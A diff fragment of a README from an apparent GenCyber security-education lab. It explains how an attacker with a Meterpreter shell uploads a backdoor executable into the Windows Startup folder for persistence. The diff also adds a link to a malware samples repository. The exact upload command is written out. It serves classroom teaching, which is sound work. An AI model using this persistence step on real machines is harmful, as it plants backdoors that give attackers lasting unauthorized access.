xinwenfu/GenCyber/SoftwareSecurity/README.md

 1. The attacker hacks into the target and opens a Meterpreter shell.

-2. Within the Meterpreter shell, *upload* the backdoor program, *nice3.exe* in the example below, to the startup folder
+2. Within the Meterpreter shell, *upload* the backdoor program, *nice3.exe* in the example below, to the startup folder. <a href="https://github.com/xinwenfu/MalwareSamples">Here</a> are a few malware samples.

 ```
 meterpreter > upload /home/kali/GenCyber/MalwareSamples/Backdoors/SimpleBindBackdoor/nice3.exe C:\\Users\\"Malware Analysis"\\AppData\\Roaming\\Microsoft\\Windows\\"Start Menu"\\Programs\\Startup\\nice3.exe